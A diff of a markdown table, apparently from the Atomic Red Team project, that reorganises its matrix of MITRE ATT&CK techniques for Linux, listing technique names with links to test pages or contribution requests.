-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Non-Standard Port](../../T1571/T1571.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
-|  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
-|  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
+| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
